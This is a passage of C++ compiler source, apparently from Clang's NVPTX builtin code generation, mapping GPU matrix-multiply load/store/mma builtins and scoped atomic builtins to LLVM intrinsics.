case NVPTX::BI__imma_m16n16k16_ld_b_u8:
return MMA_LDST(2, m16n16k16_load_b_u8);
case NVPTX::BI__imma_m16n16k16_ld_c:
return MMA_LDST(8, m16n16k16_load_c_s32);
case NVPTX::BI__imma_m32n8k16_ld_a_s8:
return MMA_LDST(4, m32n8k16_load_a_s8);
case NVPTX::BI__imma_m32n8k16_ld_a_u8:
return MMA_LDST(4, m32n8k16_load_a_u8);
case NVPTX::BI__imma_m32n8k16_ld_b_s8:
return MMA_LDST(1, m32n8k16_load_b_s8);
case NVPTX::BI__imma_m32n8k16_ld_b_u8:
return MMA_LDST(1, m32n8k16_load_b_u8);
case NVPTX::BI__imma_m32n8k16_ld_c:
return MMA_LDST(8, m32n8k16_load_c_s32);
case NVPTX::BI__imma_m8n32k16_ld_a_s8:
return MMA_LDST(1, m8n32k16_load_a_s8);
case NVPTX::BI__imma_m8n32k16_ld_a_u8:
return MMA_LDST(1, m8n32k16_load_a_u8);
case NVPTX::BI__imma_m8n32k16_ld_b_s8:
return MMA_LDST(4, m8n32k16_load_b_s8);
case NVPTX::BI__imma_m8n32k16_ld_b_u8:
return MMA_LDST(4, m8n32k16_load_b_u8);
case NVPTX::BI__imma_m8n32k16_ld_c:
return MMA_LDST(8, m8n32k16_load_c_s32);
// Sub-integer MMA loads.
// Only row/col layout is supported by A/B fragments.
case NVPTX::BI__imma_m8n8k32_ld_a_s4:
return {1, 0, MMA_INTR(m8n8k32_load_a_s4, row)};
case NVPTX::BI__imma_m8n8k32_ld_a_u4:
return {1, 0, MMA_INTR(m8n8k32_load_a_u4, row)};
case NVPTX::BI__imma_m8n8k32_ld_b_s4:
return {1, MMA_INTR(m8n8k32_load_b_s4, col), 0};
case NVPTX::BI__imma_m8n8k32_ld_b_u4:
return {1, MMA_INTR(m8n8k32_load_b_u4, col), 0};
case NVPTX::BI__imma_m8n8k32_ld_c:
return MMA_LDST(2, m8n8k32_load_c_s32);
case NVPTX::BI__bmma_m8n8k128_ld_a_b1:
return {1, 0, MMA_INTR(m8n8k128_load_a_b1, row)};
case NVPTX::BI__bmma_m8n8k128_ld_b_b1:
return {1, MMA_INTR(m8n8k128_load_b_b1, col), 0};
case NVPTX::BI__bmma_m8n8k128_ld_c:
return MMA_LDST(2, m8n8k128_load_c_s32);
// Double MMA loads
case NVPTX::BI__dmma_m8n8k4_ld_a:
return MMA_LDST(1, m8n8k4_load_a_f64);
case NVPTX::BI__dmma_m8n8k4_ld_b:
return MMA_LDST(1, m8n8k4_load_b_f64);
case NVPTX::BI__dmma_m8n8k4_ld_c:
return MMA_LDST(2, m8n8k4_load_c_f64);
// Alternate float MMA loads
case NVPTX::BI__mma_bf16_m16n16k16_ld_a:
return MMA_LDST(4, m16n16k16_load_a_bf16);
case NVPTX::BI__mma_bf16_m16n16k16_ld_b:
return MMA_LDST(4, m16n16k16_load_b_bf16);
case NVPTX::BI__mma_bf16_m8n32k16_ld_a:
return MMA_LDST(2, m8n32k16_load_a_bf16);
case NVPTX::BI__mma_bf16_m8n32k16_ld_b:
return MMA_LDST(8, m8n32k16_load_b_bf16);
case NVPTX::BI__mma_bf16_m32n8k16_ld_a:
return MMA_LDST(8, m32n8k16_load_a_bf16);
case NVPTX::BI__mma_bf16_m32n8k16_ld_b:
return MMA_LDST(2, m32n8k16_load_b_bf16);
case NVPTX::BI__mma_tf32_m16n16k8_ld_a:
return MMA_LDST(4, m16n16k8_load_a_tf32);
case NVPTX::BI__mma_tf32_m16n16k8_ld_b:
return MMA_LDST(2, m16n16k8_load_b_tf32);
case NVPTX::BI__mma_tf32_m16n16k8_ld_c:
return MMA_LDST(8, m16n16k8_load_c_f32);
// NOTE: We need to follow the inconsistent naming scheme used by NVCC. Unlike
// PTX and LLVM IR, where stores always use fragment D, NVCC builtins always
// use fragment C for both loads and stores.
// FP MMA stores.
case NVPTX::BI__hmma_m16n16k16_st_c_f16:
return MMA_LDST(4, m16n16k16_store_d_f16);
case NVPTX::BI__hmma_m16n16k16_st_c_f32:
return MMA_LDST(8, m16n16k16_store_d_f32);
case NVPTX::BI__hmma_m32n8k16_st_c_f16:
return MMA_LDST(4, m32n8k16_store_d_f16);
case NVPTX::BI__hmma_m32n8k16_st_c_f32:
return MMA_LDST(8, m32n8k16_store_d_f32);
case NVPTX::BI__hmma_m8n32k16_st_c_f16:
return MMA_LDST(4, m8n32k16_store_d_f16);
case NVPTX::BI__hmma_m8n32k16_st_c_f32:
return MMA_LDST(8, m8n32k16_store_d_f32);
// Integer and sub-integer MMA stores.
// Another naming quirk. Unlike other MMA builtins that use PTX types in the
// name, integer loads/stores use LLVM's i32.
case NVPTX::BI__imma_m16n16k16_st_c_i32:
return MMA_LDST(8, m16n16k16_store_d_s32);
case NVPTX::BI__imma_m32n8k16_st_c_i32:
return MMA_LDST(8, m32n8k16_store_d_s32);
case NVPTX::BI__imma_m8n32k16_st_c_i32:
return MMA_LDST(8, m8n32k16_store_d_s32);
case NVPTX::BI__imma_m8n8k32_st_c_i32:
return MMA_LDST(2, m8n8k32_store_d_s32);
case NVPTX::BI__bmma_m8n8k128_st_c_i32:
return MMA_LDST(2, m8n8k128_store_d_s32);
// Double MMA store
case NVPTX::BI__dmma_m8n8k4_st_c_f64:
return MMA_LDST(2, m8n8k4_store_d_f64);
// Alternate float MMA store
case NVPTX::BI__mma_m16n16k8_st_c_f32:
return MMA_LDST(8, m16n16k8_store_d_f32);
default:
llvm_unreachable("Unknown MMA builtin");
}
}
#undef MMA_LDST
#undef MMA_INTR
struct NVPTXMmaInfo {
unsigned NumEltsA;
unsigned NumEltsB;
unsigned NumEltsC;
unsigned NumEltsD;
// Variants are ordered by layout-A/layout-B/satf, where 'row' has priority
// over 'col' for layout. The index of non-satf variants is expected to match
// the undocumented layout constants used by CUDA's mma.hpp.
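// For example, getMMAIntrinsic(/*Layout=*/1, /*Satf=*/true) selects
// Variants[5], the row_col .satfinite variant in the tables below.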
std::array<unsigned, 8> Variants;
unsigned getMMAIntrinsic(int Layout, bool Satf) {
unsigned Index = Layout + 4 * Satf;
if (Index >= Variants.size())
return 0;
return Variants[Index];
}
};
// Returns the table of MMA intrinsic variants for the given builtin;
// getMMAIntrinsic() then yields the intrinsic matching Layout and Satf for
// valid combinations, and 0 otherwise.
static NVPTXMmaInfo getNVPTXMmaInfo(unsigned BuiltinID) {
// clang-format off
#define MMA_VARIANTS(geom, type) \
Intrinsic::nvvm_wmma_##geom##_mma_row_row_##type, \
Intrinsic::nvvm_wmma_##geom##_mma_row_col_##type, \
Intrinsic::nvvm_wmma_##geom##_mma_col_row_##type, \
Intrinsic::nvvm_wmma_##geom##_mma_col_col_##type
#define MMA_SATF_VARIANTS(geom, type) \
MMA_VARIANTS(geom, type), \
Intrinsic::nvvm_wmma_##geom##_mma_row_row_##type##_satfinite, \
Intrinsic::nvvm_wmma_##geom##_mma_row_col_##type##_satfinite, \
Intrinsic::nvvm_wmma_##geom##_mma_col_row_##type##_satfinite, \
Intrinsic::nvvm_wmma_##geom##_mma_col_col_##type##_satfinite
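// Variants[0..3] are thus row_row, row_col, col_row, col_col; Variants[4..7]
// are the same layouts with .satfinite.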
// Sub-integer MMA only supports row.col layout.
#define MMA_VARIANTS_I4(geom, type) \
0, \
Intrinsic::nvvm_wmma_##geom##_mma_row_col_##type, \
0, \
0, \
0, \
Intrinsic::nvvm_wmma_##geom##_mma_row_col_##type##_satfinite, \
0, \
0
// b1 MMA does not support .satfinite.
#define MMA_VARIANTS_B1_XOR(geom, type) \
0, \
Intrinsic::nvvm_wmma_##geom##_mma_xor_popc_row_col_##type, \
0, \
0, \
0, \
0, \
0, \
0
#define MMA_VARIANTS_B1_AND(geom, type) \
0, \
Intrinsic::nvvm_wmma_##geom##_mma_and_popc_row_col_##type, \
0, \
0, \
0, \
0, \
0, \
0
// clang-format on
switch (BuiltinID) {
// FP MMA
// Note that the 'type' argument of MMA_SATF_VARIANTS uses D_C notation, while
// the NumElts fields of the return value are ordered as A,B,C,D.
case NVPTX::BI__hmma_m16n16k16_mma_f16f16:
return {8, 8, 4, 4, {{MMA_SATF_VARIANTS(m16n16k16, f16_f16)}}};
case NVPTX::BI__hmma_m16n16k16_mma_f32f16:
return {8, 8, 4, 8, {{MMA_SATF_VARIANTS(m16n16k16, f32_f16)}}};
case NVPTX::BI__hmma_m16n16k16_mma_f16f32:
return {8, 8, 8, 4, {{MMA_SATF_VARIANTS(m16n16k16, f16_f32)}}};
case NVPTX::BI__hmma_m16n16k16_mma_f32f32:
return {8, 8, 8, 8, {{MMA_SATF_VARIANTS(m16n16k16, f32_f32)}}};
case NVPTX::BI__hmma_m32n8k16_mma_f16f16:
return {8, 8, 4, 4, {{MMA_SATF_VARIANTS(m32n8k16, f16_f16)}}};
case NVPTX::BI__hmma_m32n8k16_mma_f32f16:
return {8, 8, 4, 8, {{MMA_SATF_VARIANTS(m32n8k16, f32_f16)}}};
case NVPTX::BI__hmma_m32n8k16_mma_f16f32:
return {8, 8, 8, 4, {{MMA_SATF_VARIANTS(m32n8k16, f16_f32)}}};
case NVPTX::BI__hmma_m32n8k16_mma_f32f32:
return {8, 8, 8, 8, {{MMA_SATF_VARIANTS(m32n8k16, f32_f32)}}};
case NVPTX::BI__hmma_m8n32k16_mma_f16f16:
return {8, 8, 4, 4, {{MMA_SATF_VARIANTS(m8n32k16, f16_f16)}}};
case NVPTX::BI__hmma_m8n32k16_mma_f32f16:
return {8, 8, 4, 8, {{MMA_SATF_VARIANTS(m8n32k16, f32_f16)}}};
case NVPTX::BI__hmma_m8n32k16_mma_f16f32:
return {8, 8, 8, 4, {{MMA_SATF_VARIANTS(m8n32k16, f16_f32)}}};
case NVPTX::BI__hmma_m8n32k16_mma_f32f32:
return {8, 8, 8, 8, {{MMA_SATF_VARIANTS(m8n32k16, f32_f32)}}};
// Integer MMA
case NVPTX::BI__imma_m16n16k16_mma_s8:
return {2, 2, 8, 8, {{MMA_SATF_VARIANTS(m16n16k16, s8)}}};
case NVPTX::BI__imma_m16n16k16_mma_u8:
return {2, 2, 8, 8, {{MMA_SATF_VARIANTS(m16n16k16, u8)}}};
case NVPTX::BI__imma_m32n8k16_mma_s8:
return {4, 1, 8, 8, {{MMA_SATF_VARIANTS(m32n8k16, s8)}}};
case NVPTX::BI__imma_m32n8k16_mma_u8:
return {4, 1, 8, 8, {{MMA_SATF_VARIANTS(m32n8k16, u8)}}};
case NVPTX::BI__imma_m8n32k16_mma_s8:
return {1, 4, 8, 8, {{MMA_SATF_VARIANTS(m8n32k16, s8)}}};
case NVPTX::BI__imma_m8n32k16_mma_u8:
return {1, 4, 8, 8, {{MMA_SATF_VARIANTS(m8n32k16, u8)}}};
// Sub-integer MMA
case NVPTX::BI__imma_m8n8k32_mma_s4:
return {1, 1, 2, 2, {{MMA_VARIANTS_I4(m8n8k32, s4)}}};
case NVPTX::BI__imma_m8n8k32_mma_u4:
return {1, 1, 2, 2, {{MMA_VARIANTS_I4(m8n8k32, u4)}}};
case NVPTX::BI__bmma_m8n8k128_mma_xor_popc_b1:
return {1, 1, 2, 2, {{MMA_VARIANTS_B1_XOR(m8n8k128, b1)}}};
case NVPTX::BI__bmma_m8n8k128_mma_and_popc_b1:
return {1, 1, 2, 2, {{MMA_VARIANTS_B1_AND(m8n8k128, b1)}}};
// Double MMA
case NVPTX::BI__dmma_m8n8k4_mma_f64:
return {1, 1, 2, 2, {{MMA_VARIANTS(m8n8k4, f64)}}};
// Alternate FP MMA
case NVPTX::BI__mma_bf16_m16n16k16_mma_f32:
return {4, 4, 8, 8, {{MMA_VARIANTS(m16n16k16, bf16)}}};
case NVPTX::BI__mma_bf16_m8n32k16_mma_f32:
return {2, 8, 8, 8, {{MMA_VARIANTS(m8n32k16, bf16)}}};
case NVPTX::BI__mma_bf16_m32n8k16_mma_f32:
return {8, 2, 8, 8, {{MMA_VARIANTS(m32n8k16, bf16)}}};
case NVPTX::BI__mma_tf32_m16n16k8_mma_f32:
return {4, 4, 8, 8, {{MMA_VARIANTS(m16n16k8, tf32)}}};
default:
llvm_unreachable("Unexpected builtin ID.");
}
#undef MMA_VARIANTS
#undef MMA_SATF_VARIANTS
#undef MMA_VARIANTS_I4
#undef MMA_VARIANTS_B1_AND
#undef MMA_VARIANTS_B1_XOR
}
} // namespace
Value *
CodeGenFunction::EmitNVPTXBuiltinExpr(unsigned BuiltinID, const CallExpr *E) {
auto MakeLdg = [&](unsigned IntrinsicID) {
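// e.g. __nvvm_ldg_i(p) becomes a call to llvm.nvvm.ldg.global.i (overloaded
// on the loaded type and the pointer type) with the pointee's natural
// alignment passed as an explicit i32 operand.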
Value *Ptr = EmitScalarExpr(E->getArg(0));
clang::CharUnits Align =
CGM.getNaturalPointeeTypeAlignment(E->getArg(0)->getType());
return Builder.CreateCall(
CGM.getIntrinsic(IntrinsicID, {Ptr->getType()->getPointerElementType(),
Ptr->getType()}),
{Ptr, ConstantInt::get(Builder.getInt32Ty(), Align.getQuantity())});
};
auto MakeScopedAtomic = [&](unsigned IntrinsicID) {
Value *Ptr = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(IntrinsicID, {Ptr->getType()->getPointerElementType(),
Ptr->getType()}),
{Ptr, EmitScalarExpr(E->getArg(1))});
};
auto MakeScopedCasAtomic = [&](unsigned IntrinsicID) {
Value *Ptr = EmitScalarExpr(E->getArg(0));
return Builder.CreateCall(
CGM.getIntrinsic(IntrinsicID, {Ptr->getType()->getPointerElementType(),
Ptr->getType()}),
{Ptr, EmitScalarExpr(E->getArg(1)), EmitScalarExpr(E->getArg(2))});
};
switch (BuiltinID) {
case NVPTX::BI__nvvm_atom_add_gen_i:
case NVPTX::BI__nvvm_atom_add_gen_l:
case NVPTX::BI__nvvm_atom_add_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Add, E);
case NVPTX::BI__nvvm_atom_sub_gen_i:
case NVPTX::BI__nvvm_atom_sub_gen_l:
case NVPTX::BI__nvvm_atom_sub_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Sub, E);
case NVPTX::BI__nvvm_atom_and_gen_i:
case NVPTX::BI__nvvm_atom_and_gen_l:
case NVPTX::BI__nvvm_atom_and_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::And, E);
case NVPTX::BI__nvvm_atom_or_gen_i:
case NVPTX::BI__nvvm_atom_or_gen_l:
case NVPTX::BI__nvvm_atom_or_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Or, E);
case NVPTX::BI__nvvm_atom_xor_gen_i:
case NVPTX::BI__nvvm_atom_xor_gen_l:
case NVPTX::BI__nvvm_atom_xor_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Xor, E);
case NVPTX::BI__nvvm_atom_xchg_gen_i:
case NVPTX::BI__nvvm_atom_xchg_gen_l:
case NVPTX::BI__nvvm_atom_xchg_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Xchg, E);
case NVPTX::BI__nvvm_atom_max_gen_i:
case NVPTX::BI__nvvm_atom_max_gen_l:
case NVPTX::BI__nvvm_atom_max_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Max, E);
case NVPTX::BI__nvvm_atom_max_gen_ui:
case NVPTX::BI__nvvm_atom_max_gen_ul:
case NVPTX::BI__nvvm_atom_max_gen_ull:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::UMax, E);
case NVPTX::BI__nvvm_atom_min_gen_i:
case NVPTX::BI__nvvm_atom_min_gen_l:
case NVPTX::BI__nvvm_atom_min_gen_ll:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::Min, E);
case NVPTX::BI__nvvm_atom_min_gen_ui:
case NVPTX::BI__nvvm_atom_min_gen_ul:
case NVPTX::BI__nvvm_atom_min_gen_ull:
return MakeBinaryAtomicValue(*this, llvm::AtomicRMWInst::UMin, E);
case NVPTX::BI__nvvm_atom_cas_gen_i:
case NVPTX::BI__nvvm_atom_cas_gen_l:
case NVPTX::BI__nvvm_atom_cas_gen_ll:
// __nvvm_atom_cas_gen_* should return the old value rather than the
// success flag.
return MakeAtomicCmpXchgValue(*this, E, /*ReturnBool=*/false);
case NVPTX::BI__nvvm_atom_add_gen_f:
case NVPTX::BI__nvvm_atom_add_gen_d: {
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
return Builder.CreateAtomicRMW(llvm::AtomicRMWInst::FAdd, Ptr, Val,
AtomicOrdering::SequentiallyConsistent);
}
case NVPTX::BI__nvvm_atom_inc_gen_ui: {
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
Function *FnALI32 =
CGM.getIntrinsic(Intrinsic::nvvm_atomic_load_inc_32, Ptr->getType());
return Builder.CreateCall(FnALI32, {Ptr, Val});
}
case NVPTX::BI__nvvm_atom_dec_gen_ui: {
Value *Ptr = EmitScalarExpr(E->getArg(0));
Value *Val = EmitScalarExpr(E->getArg(1));
Function *FnALD32 =
CGM.getIntrinsic(Intrinsic::nvvm_atomic_load_dec_32, Ptr->getType());
return Builder.CreateCall(FnALD32, {Ptr, Val});
}
case NVPTX::BI__nvvm_ldg_c:
case NVPTX::BI__nvvm_ldg_c2:
case NVPTX::BI__nvvm_ldg_c4:
case NVPTX::BI__nvvm_ldg_s:
case NVPTX::BI__nvvm_ldg_s2:
case NVPTX::BI__nvvm_ldg_s4:
case NVPTX::BI__nvvm_ldg_i:
case NVPTX::BI__nvvm_ldg_i2:
case NVPTX::BI__nvvm_ldg_i4:
case NVPTX::BI__nvvm_ldg_l:
case NVPTX::BI__nvvm_ldg_ll:
case NVPTX::BI__nvvm_ldg_ll2:
case NVPTX::BI__nvvm_ldg_uc:
case NVPTX::BI__nvvm_ldg_uc2:
case NVPTX::BI__nvvm_ldg_uc4:
case NVPTX::BI__nvvm_ldg_us:
case NVPTX::BI__nvvm_ldg_us2:
case NVPTX::BI__nvvm_ldg_us4:
case NVPTX::BI__nvvm_ldg_ui:
case NVPTX::BI__nvvm_ldg_ui2:
case NVPTX::BI__nvvm_ldg_ui4:
case NVPTX::BI__nvvm_ldg_ul:
case NVPTX::BI__nvvm_ldg_ull:
case NVPTX::BI__nvvm_ldg_ull2:
// PTX Interoperability section 2.2: "For a vector with an even number of
// elements, its alignment is set to number of elements times the alignment
// of its member: n*alignof(t)."
return MakeLdg(Intrinsic::nvvm_ldg_global_i);
case NVPTX::BI__nvvm_ldg_f:
case NVPTX::BI__nvvm_ldg_f2:
case NVPTX::BI__nvvm_ldg_f4:
case NVPTX::BI__nvvm_ldg_d:
case NVPTX::BI__nvvm_ldg_d2:
return MakeLdg(Intrinsic::nvvm_ldg_global_f);
case NVPTX::BI__nvvm_atom_cta_add_gen_i:
case NVPTX::BI__nvvm_atom_cta_add_gen_l:
case NVPTX::BI__nvvm_atom_cta_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_add_gen_i:
case NVPTX::BI__nvvm_atom_sys_add_gen_l:
case NVPTX::BI__nvvm_atom_sys_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_add_gen_f:
case NVPTX::BI__nvvm_atom_cta_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_cta);
case NVPTX::BI__nvvm_atom_sys_add_gen_f:
case NVPTX::BI__nvvm_atom_sys_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_sys);
case NVPTX::BI__nvvm_atom_cta_xchg_gen_i:
case NVPTX::BI__nvvm_atom_cta_xchg_gen_l:
case NVPTX::BI__nvvm_atom_cta_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_xchg_gen_i:
case NVPTX::BI__nvvm_atom_sys_xchg_gen_l:
case NVPTX::BI__nvvm_atom_sys_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_max_gen_i:
case NVPTX::BI__nvvm_atom_cta_max_gen_l:
case NVPTX::BI__nvvm_atom_cta_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_cta);
case NVPTX::BI__nvvm_atom_cta_max_gen_ui:
case NVPTX::BI__nvvm_atom_cta_max_gen_ul:
case NVPTX::BI__nvvm_atom_cta_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_cta);
case NVPTX::BI__nvvm_atom_sys_max_gen_i:
case NVPTX::BI__nvvm_atom_sys_max_gen_l:
case NVPTX::BI__nvvm_atom_sys_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_sys);
case NVPTX::BI__nvvm_atom_sys_max_gen_ui:
case NVPTX::BI__nvvm_atom_sys_max_gen_ul:
case NVPTX::BI__nvvm_atom_sys_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_sys);
case NVPTX::BI__nvvm_atom_cta_min_gen_i:
case NVPTX::BI__nvvm_atom_cta_min_gen_l:
case NVPTX::BI__nvvm_atom_cta_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_cta);
case NVPTX::BI__nvvm_atom_cta_min_gen_ui:
case NVPTX::BI__nvvm_atom_cta_min_gen_ul:
case NVPTX::BI__nvvm_atom_cta_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_cta);
case NVPTX::BI__nvvm_atom_sys_min_gen_i:
case NVPTX::BI__nvvm_atom_sys_min_gen_l:
case NVPTX::BI__nvvm_atom_sys_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_sys);
case NVPTX::BI__nvvm_atom_sys_min_gen_ui:
case NVPTX::BI__nvvm_atom_sys_min_gen_ul:
case NVPTX::BI__nvvm_atom_sys_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_sys);
case NVPTX::BI__nvvm_atom_cta_inc_gen_ui:
case NVPTX::BI__nvvm_atom_cta_inc_gen_ul:
case NVPTX::BI__nvvm_atom_cta_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_cta);
case NVPTX::BI__nvvm_atom_cta_dec_gen_ui:
case NVPTX::BI__nvvm_atom_cta_dec_gen_ul:
case NVPTX::BI__nvvm_atom_cta_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_inc_gen_ui:
case NVPTX::BI__nvvm_atom_sys_inc_gen_ul:
case NVPTX::BI__nvvm_atom_sys_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_sys);
case NVPTX::BI__nvvm_atom_sys_dec_gen_ui:
case NVPTX::BI__nvvm_atom_sys_dec_gen_ul:
case NVPTX::BI__nvvm_atom_sys_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_and_gen_i:
case NVPTX::BI__nvvm_atom_cta_and_gen_l:
case NVPTX::BI__nvvm_atom_cta_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_and_gen_i:
case NVPTX::BI__nvvm_atom_sys_and_gen_l:
case NVPTX::BI__nvvm_atom_sys_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_or_gen_i:
case NVPTX::BI__nvvm_atom_cta_or_gen_l:
case NVPTX::BI__nvvm_atom_cta_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_or_gen_i:
case NVPTX::BI__nvvm_atom_sys_or_gen_l:
case NVPTX::BI__nvvm_atom_sys_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_xor_gen_i:
case NVPTX::BI__nvvm_atom_cta_xor_gen_l:
case NVPTX::BI__nvvm_atom_cta_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_xor_gen_i:
case NVPTX::BI__nvvm_atom_sys_xor_gen_l:
case NVPTX::BI__nvvm_atom_sys_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_sys);
case NVPTX::BI__nvvm_atom_cta_cas_gen_i:
case NVPTX::BI__nvvm_atom_cta_cas_gen_l:
case NVPTX::BI__nvvm_atom_cta_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_cta);
case NVPTX::BI__nvvm_atom_sys_cas_gen_i:
case NVPTX::BI__nvvm_atom_sys_cas_gen_l:
case NVPTX::BI__nvvm_atom_sys_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_sys);
case NVPTX::BI__nvvm_atom_acquire_add_gen_i:
case NVPTX::BI__nvvm_atom_acquire_add_gen_l:
case NVPTX::BI__nvvm_atom_acquire_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_add_gen_f:
case NVPTX::BI__nvvm_atom_acquire_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acquire);
case NVPTX::BI__nvvm_atom_acquire_xchg_gen_i:
case NVPTX::BI__nvvm_atom_acquire_xchg_gen_l:
case NVPTX::BI__nvvm_atom_acquire_xchg_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_exch_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_gen_i:
case NVPTX::BI__nvvm_atom_acquire_max_gen_l:
case NVPTX::BI__nvvm_atom_acquire_max_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_max_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_max_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_max_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_max_gen_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_gen_i:
case NVPTX::BI__nvvm_atom_acquire_min_gen_l:
case NVPTX::BI__nvvm_atom_acquire_min_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_min_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_min_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_min_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_min_gen_ui_acquire);
case NVPTX::BI__nvvm_atom_acquire_inc_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_inc_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_inc_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_inc_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_dec_gen_ui:
case NVPTX::BI__nvvm_atom_acquire_dec_gen_ul:
case NVPTX::BI__nvvm_atom_acquire_dec_gen_ull:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_dec_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_and_gen_i:
case NVPTX::BI__nvvm_atom_acquire_and_gen_l:
case NVPTX::BI__nvvm_atom_acquire_and_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_and_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_or_gen_i:
case NVPTX::BI__nvvm_atom_acquire_or_gen_l:
case NVPTX::BI__nvvm_atom_acquire_or_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_or_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_xor_gen_i:
case NVPTX::BI__nvvm_atom_acquire_xor_gen_l:
case NVPTX::BI__nvvm_atom_acquire_xor_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_xor_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cas_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cas_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cas_gen_ll:
return MakeScopedCasAtomic(Intrinsic::nvvm_atomic_cas_gen_i_acquire);
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_i:
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_l:
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_i:
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_l:
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_ll:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_i_acquire_sys);
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_f:
case NVPTX::BI__nvvm_atom_acquire_cta_add_gen_d:
return MakeScopedAtomic(Intrinsic::nvvm_atomic_add_gen_f_acquire_cta);
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_f:
case NVPTX::BI__nvvm_atom_acquire_sys_add_gen_d:
